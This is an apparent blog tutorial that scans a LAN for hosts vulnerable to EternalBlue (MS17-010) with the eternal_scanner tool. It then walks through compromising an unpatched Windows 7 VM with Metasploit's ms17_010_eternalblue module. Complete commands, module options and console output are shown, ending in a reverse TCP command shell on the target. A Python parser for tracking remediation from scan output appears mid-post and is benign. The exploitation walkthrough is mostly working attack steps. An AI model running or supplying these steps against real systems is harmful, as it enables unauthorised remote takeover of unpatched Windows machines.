Scan your LAN for hosts that are still vulnerable to EternalBlue (ETERNAL SCANNER)

Overview

It has been a while since I wrote a post about a tool. Today's tool is an EternalBlue vulnerability scanner that can scan a single host or a whole IP range. Without further ado, let's install it and try it out.

Usage

First start the Kali VM. Ideally also prepare a freshly installed Windows 7 VM; network discovery and file sharing must be turned on in Windows 7, which is what exposes TCP port 445. Then download the tool:

git clone https://github.com/peterpt/eternal_scanner.git

Install the packages it depends on:

apt install masscan metasploit-framework wget

Finally set the scan rate to its maximum, point it at the whole LAN and run it:

root@kali:~/kali_tools/eternal_scanner# ./escan -s 10000000
 *****************************************
 * ▄▄▄ .▄▄▄▄▄▄▄▄ .▄▄▄   ▐ ▄  ▄▄▄· ▄▄▌    *
 * ▀▄.▀·•██  ▀▄.▀·▀▄ █·•█▌▐█▐█ ▀█ ██•    *
 * ▐▀▀▪▄ ▐█.▪▐▀▀▪▄▐▀▀▄ ▐█▐▐▌▄█▀▀█ ██▪    *
 * ▐█▄▄▌ ▐█▌·▐█▄▄▌▐█•█▌██▐█▌▐█ ▪▐▌▐█▌▐▌  *
 *  ▀▀▀  ▀▀▀  ▀▀▀ .▀  ▀▀▀ █▪ ▀  ▀ .▀▀▀   *
 * .▄▄ ·  ▄▄·  ▄▄▄·  ▐ ▄  ▐ ▄ ▄▄▄ .▄▄▄   *
 * ▐█ ▀. ▐█ ▌▪▐█ ▀█ •█▌▐█•█▌▐█▀▄.▀·▀▄ █· *
 * ▄▀▀▀█▄██ ▄▄▄█▀▀█ ▐█▐▐▌▐█▐▐▌▐▀▀▪▄▐▀▀▄  *
 * ▐█▄▪▐█▐███▌▐█ ▪▐▌██▐█▌██▐█▌▐█▄▄▌▐█•█▌ *
 *  ▀▀▀▀ ·▀▀▀  ▀  ▀ ▀▀ █▪▀▀ █▪ ▀▀▀ .▀  ▀ *
 *****************************************
 *        Current Version : 2.1          *
 *****************************************

 For switches write (escan -h)
 Config Port: 445 | Rate Speed: 10000000 pkt/s

 Enter IP or IP range .
 Example 1 : 192.168.1.32
 Example 2 : 192.168.1.1/24

 IP/IP Range : 192.168.1.1/24

 User IP Input : 192.168.1.1/24


 Press CTRL-C (1X ONLY) to stop the scanner 

Scanner started at 04:18:50 , Please Wait
Scanner stopped/finished at 04:19:08 
 It was not detected in 192.168.1.1/24 any port 445 opened.

A complete EternalBlue compromise of Windows 7

Next I boot the Windows VM I installed earlier and go after it. To be clear up front: this machine is a fresh install with no patches applied at all, and network discovery and file sharing are turned on. At this point all I know is that the machine is somewhere on my LAN; I do not know its IP address, so I use the tool to scan for it.

root@kali:~/kali_tools/eternal_scanner# ./escan -s 10000000 
 *****************************************
 * ▄▄▄ .▄▄▄▄▄▄▄▄ .▄▄▄   ▐ ▄  ▄▄▄· ▄▄▌    *
 * ▀▄.▀·•██  ▀▄.▀·▀▄ █·•█▌▐█▐█ ▀█ ██•    *
 * ▐▀▀▪▄ ▐█.▪▐▀▀▪▄▐▀▀▄ ▐█▐▐▌▄█▀▀█ ██▪    *
 * ▐█▄▄▌ ▐█▌·▐█▄▄▌▐█•█▌██▐█▌▐█ ▪▐▌▐█▌▐▌  *
 *  ▀▀▀  ▀▀▀  ▀▀▀ .▀  ▀▀▀ █▪ ▀  ▀ .▀▀▀   *
 * .▄▄ ·  ▄▄·  ▄▄▄·  ▐ ▄  ▐ ▄ ▄▄▄ .▄▄▄   *
 * ▐█ ▀. ▐█ ▌▪▐█ ▀█ •█▌▐█•█▌▐█▀▄.▀·▀▄ █· *
 * ▄▀▀▀█▄██ ▄▄▄█▀▀█ ▐█▐▐▌▐█▐▐▌▐▀▀▪▄▐▀▀▄  *
 * ▐█▄▪▐█▐███▌▐█ ▪▐▌██▐█▌██▐█▌▐█▄▄▌▐█•█▌ *
 *  ▀▀▀▀ ·▀▀▀  ▀  ▀ ▀▀ █▪▀▀ █▪ ▀▀▀ .▀  ▀ *
 *****************************************
 *        Current Version : 2.1          *
 *****************************************

 For switches write (escan -h)
 Config Port: 445 | Rate Speed: 10000000 pkt/s

 Enter IP or IP range .
 Example 1 : 192.168.1.32
 Example 2 : 192.168.1.1/24

 IP/IP Range : 192.168.1.1/24

 User IP Input : 192.168.1.1/24


 Press CTRL-C (1X ONLY) to stop the scanner 

Scanner started at 04:25:15 , Please Wait
Scanner stopped/finished at 04:25:35 

        Checking ips :
 ----------------------------
 
192.168.1.107

 ----------------------------
Collected 1 ips
 Checking if the 1 ips above are vulnerable

 Press CTRL-C (1X ONLY) to stop ips vulnerability check
 (aborting this process will not verify all ips)

Please Wait , checking 1 ips may take a while
 +---------------------------------------------------+
 | Realtime Eternal Scan Metasploit results Checkout |
 +---------------------------------------------------+
 |      Please wait for percentage output            |
 +---------------------------------------------------+
[*] Scanned 1 of 1 hosts (100% complete)

 1 Vulnerable ips found
---------------------------------------
192.168.1.107
---------------------------------------
 Eternal Scanner saved the vulnerable ips to /usr/local/share/Eternal_Scanner/vuln.txt

As you can see, the scan found one IP, 192.168.1.107, and saved the result to /usr/local/share/Eternal_Scanner/vuln.txt. Now we move on to exploitation. First open Metasploit and search for an exploit module; if there is none, you need to update your Metasploit.
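For anyone running escan on a schedule to track remediation rather than to attack anything, the useful artefact is the list of hosts with 445 open and the subset the Metasploit check flagged. The following parser is an added example written for this post; it is not part of the eternal_scanner project. It reads the escan terminal output exactly in the format shown above (the field labels, the bare-IP lines between the dashed separators and the "saved the vulnerable ips to" line are the only things it relies on), reads vuln.txt under the assumption that it holds one IPv4 address per line, and diffs two runs so a defender can see which hosts were patched and which are new. The sample inputs are constructed from the two runs shown on this page.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: the second escan run shown above, trimmed to the lines the parser reads.
SAMPLE_ESCAN_OUTPUT = """\
 Config Port: 445 | Rate Speed: 10000000 pkt/s
 IP/IP Range : 192.168.1.1/24
 User IP Input : 192.168.1.1/24
Scanner started at 04:25:15 , Please Wait
Scanner stopped/finished at 04:25:35
        Checking ips :
 ----------------------------
192.168.1.107
 ----------------------------
Collected 1 ips
 Checking if the 1 ips above are vulnerable
[*] Scanned 1 of 1 hosts (100% complete)
 1 Vulnerable ips found
---------------------------------------
192.168.1.107
---------------------------------------
 Eternal Scanner saved the vulnerable ips to /usr/local/share/Eternal_Scanner/vuln.txt
"""

# Constructed sample: the first run above, where nothing on the LAN had 445 open.
SAMPLE_EMPTY_OUTPUT = """\
 Config Port: 445 | Rate Speed: 10000000 pkt/s
 User IP Input : 192.168.1.1/24
Scanner started at 04:18:50 , Please Wait
Scanner stopped/finished at 04:19:08
 It was not detected in 192.168.1.1/24 any port 445 opened.
"""

# A line that is nothing but a dotted-quad address.
IPV4_LINE = re.compile(r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s*$")


@dataclass
class ScanResult:
    target: str = ""
    port: int = 0
    rate: int = 0
    collected: int = 0                               # count escan reports
    open_hosts: list = field(default_factory=list)   # hosts with port 445 reachable
    vulnerable: list = field(default_factory=list)   # hosts flagged by the Metasploit check
    vuln_file: str = ""


def parse_escan_output(text: str) -> ScanResult:
    """Parse one escan terminal session into a ScanResult.

    Bare IPv4 lines seen before 'N Vulnerable ips found' are hosts with 445 open;
    bare IPv4 lines seen after it are the ones the MS17-010 check flagged.
    """
    result = ScanResult()
    section = "open"  # which list a bare IP line currently belongs to
    for line in text.splitlines():
        m = re.search(r"Config Port: (\d+) \| Rate Speed: (\d+)", line)
        if m:
            result.port, result.rate = int(m.group(1)), int(m.group(2))
            continue
        m = re.search(r"User IP Input : (\S+)", line)
        if m:
            result.target = m.group(1)
            continue
        m = re.search(r"Collected (\d+) ips", line)
        if m:
            result.collected = int(m.group(1))
            continue
        if re.search(r"\d+ Vulnerable ips found", line):
            section = "vuln"
            continue
        m = re.search(r"saved the vulnerable ips to (\S+)", line)
        if m:
            result.vuln_file = m.group(1)
            continue
        m = IPV4_LINE.match(line)
        if m:
            (result.open_hosts if section == "open" else result.vulnerable).append(m.group(1))
    return result


def parse_vuln_file(text: str) -> list:
    """Read vuln.txt. Assumption (not verified against the tool): one IPv4 address per line."""
    return [m.group(1) for m in map(IPV4_LINE.match, text.splitlines()) if m]


def diff_runs(previous: list, current: list) -> dict:
    """Compare the vulnerable-host lists of two runs: newly seen, fixed since, still open."""
    prev, cur = set(previous), set(current)
    return {
        "new": sorted(cur - prev),
        "fixed": sorted(prev - cur),
        "still_vulnerable": sorted(prev & cur),
    }


if __name__ == "__main__":
    r = parse_escan_output(SAMPLE_ESCAN_OUTPUT)
    print(f"{r.target}: {len(r.open_hosts)} host(s) with {r.port}/tcp open, "
          f"{len(r.vulnerable)} flagged vulnerable, list saved to {r.vuln_file}")
    # Pretend the previous run flagged the same host and this run flagged nobody.
    print(diff_runs(r.vulnerable, parse_escan_output(SAMPLE_EMPTY_OUTPUT).vulnerable))
```

The `collected` count is kept separately from the parsed `open_hosts` list so a run where the two disagree (an output that was cut off, or a format change in a newer escan release) can be spotted rather than silently trusted.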

root@kali:~/kali_tools/eternal_scanner# msfconsole 
                                                  
  +-------------------------------------------------------+
  |  METASPLOIT by Rapid7                                 |
  +---------------------------+---------------------------+
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  +---------------------------+---------------------------+
  |      o O o                |        \'\/\/\/'/         |
  |              o O          |         )======(          |
  |                 o         |       .'  LOOT  '.        |
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |
  | |    PAYLOAD     |""\___, |     /    (_||_     \      |
  | |________________|__|)__| |    |     __||_)     |     |
  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |
  |  = = = = = = = = = = = =  |     '--------------'      |
  +---------------------------+---------------------------+


       =[ metasploit v4.16.7-dev                          ]
+ -- --=[ 1682 exploits - 964 auxiliary - 299 post        ]
+ -- --=[ 498 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > search CVE-2017-0144
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                      Disclosure Date  Rank     Description
   ----                                      ---------------  ----     -----------
   auxiliary/scanner/smb/smb_ms17_010                         normal   MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption


msf > 

Sure enough, there are two modules we can use: the first is a scanner module and the second is the exploit module. The rest is straightforward; follow along with what I do below.

msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST               192.168.1.107    yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.104    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.107
rhost => 192.168.1.107
msf exploit(ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.104:4444 
[*] 192.168.1.107:445 - Connecting to target for exploitation.
[+] 192.168.1.107:445 - Connection established for exploitation.
[+] 192.168.1.107:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.107:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.1.107:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.1.107:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service 
[*] 192.168.1.107:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1          
[+] 192.168.1.107:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.107:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.107:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.107:445 - Starting non-paged pool grooming
[+] 192.168.1.107:445 - Sending SMBv2 buffers
[+] 192.168.1.107:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.107:445 - Sending final SMBv2 buffers.
[*] 192.168.1.107:445 - Sending last fragment of exploit packet!
[*] 192.168.1.107:445 - Receiving response from exploit packet
[+] 192.168.1.107:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.107:445 - Sending egg to corrupted connection.
[*] 192.168.1.107:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.1.104:4444 -> 192.168.1.107:49161) at 2017-10-18 04:35:41 -0400
[+] 192.168.1.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>    

Success.

Feel free to follow Bboysoul's blog at www.bboysoul.com. Have Fun.
